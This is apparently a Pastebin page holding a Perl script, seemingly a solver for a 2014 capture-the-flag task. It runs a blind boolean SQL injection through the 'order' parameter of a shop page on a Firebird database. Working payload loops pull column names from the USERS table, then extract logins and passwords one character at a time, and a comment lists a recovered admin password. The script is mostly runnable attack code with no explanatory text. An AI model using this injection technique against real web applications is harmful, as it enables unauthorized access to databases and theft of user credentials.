SHARE
TWEET

Untitled

a guest Jan 16th, 2014 159 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. use LWP::Simple;
  2. #username:password
  3. #admin:9shS3FAk
  4.  
  5. # extract columns from USERS
  6.  
  7. $url="http://hackyou2014tasks.ctf.su:30080/index.php?page=shop&order=";
  8.  
  9. $fst="case when(1=(select first 1 1 from rdb\$relation_fields where lower(RDB\$RELATION_NAME)=ascii_char(117)||ascii_char(115)||ascii_char(101)||ascii_char(114)||ascii_char(115) and lower(rdb\$field_name) LIKE ";
  10. $snd="||ascii_char(37) )) then (select first 1 1 from rdb\$relations) else (select first 2 1 from rdb\$relations) end";
  11. $b=0;
  12.  
  13.  
  14. # LOGIN column part
  15. for($j=0;$j<100;$j++){
  16. for($i=97;$i<122;$i++){
  17.         $sql=$url.$fst."ascii_char(".$i.")".$snd;
  18.         #print "j: ".$j." i:".$i."\n";
  19.         $html=get $sql;
  20.         if ($html=~/1337/ && $i!=37 && $i!=95){
  21.                 print chr($i);
  22.                 $fst.="ascii_char(".$i.")||";
  23.  
  24.                 last;
  25.         }else{
  26.                 $b++;
  27.         }
  28. }
  29. if($b==122-97){
  30.         last;
  31. }else{
  32. $b=0;
  33. }
  34. }
  35. print "\n";
  36.  
  37. # PASSWD column part
  38. $fst="case when(1=(select first 1 1 from rdb\$relation_fields where lower(RDB\$RELATION_NAME)=ascii_char(117)||ascii_char(115)||ascii_char(101)||ascii_char(114)||ascii_char(115) and lower(rdb\$field_name) LIKE ";
  39. $b=0;
  40. for($j=0;$j<100;$j++){
  41. for($i=97;$i<122;$i++){
  42.         $sql=$url.$fst."ascii_char(".$i.")".$snd;
  43.  
  44.         $html=get $sql;
  45.         if ($html=~/1337/ && $i!=37 && $i!=95 && $i!=108){
  46.                 print chr($i);
  47.                 $fst.="ascii_char(".$i.")||";
  48.                 last;
  49.         }else{
  50.                 $b++;
  51.         }
  52. }
  53. if($b==122-97){
  54.         last;
  55. }else{
  56. $b=0;
  57. }
  58. }
  59. print "\n";
  60.  
  61. #extract data from USERS ( LOGIN,PASSWD)
  62.  
  63. $fst="case when(1=(select first 1 1 from USERS where LOGIN LIKE ";
  64. $snd="||ascii_char(37) )) then (select first 1 1 from rdb\$relations) else (select first 2 1 from rdb\$relations) end";
  65. for($j=0;$j<100;$j++){
  66. for($i=65;$i<=122;$i++){
  67.         $sql=$url.$fst."ascii_char(".$i.")".$snd;
  68.         #print $j." ".$i."\n";
  69.  
  70.         $html=get $sql;
  71.         if ($html=~/1337/ && $i!=37 && $i!=95){
  72.                 print chr($i)."\n";
  73.                 $fst.="ascii_char(".$i.")||";
  74.                 last;
  75.         }else{
  76.                 $b++;
  77.         }
  78. }
  79. if($b==123-65){
  80.         last;
  81. }else{
  82. $b=0;
  83. }
  84. }
  85. print "\n";
  86.  
  87. $fst="case when(1=(select first 1 1 from USERS where PASSWD LIKE ";
  88. $snd="||ascii_char(37) )) then (select first 1 1 from rdb\$relations) else (select first 2 1 from rdb\$relations) end";
  89. for($j=0;$j<100;$j++){
  90. for($i=48;$i<=122;$i++){
  91.         $sql=$url.$fst."ascii_char(".$i.")".$snd;
  92.         #print $j." ".$i."\n";
  93.  
  94.         $html=get $sql;
  95.         if ($html=~/1337/ && $i!=37 && $i!=95){
  96.                 print chr($i)."\n";
  97.                 $fst.="ascii_char(".$i.")||";
  98.                 last;
  99.         }else{
  100.                 $b++;
  101.         }
  102. }
  103. if($b==123-48){
  104.         last;
  105. }else{
  106. $b=0;
  107. }
  108. }
  109. print "\n";
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top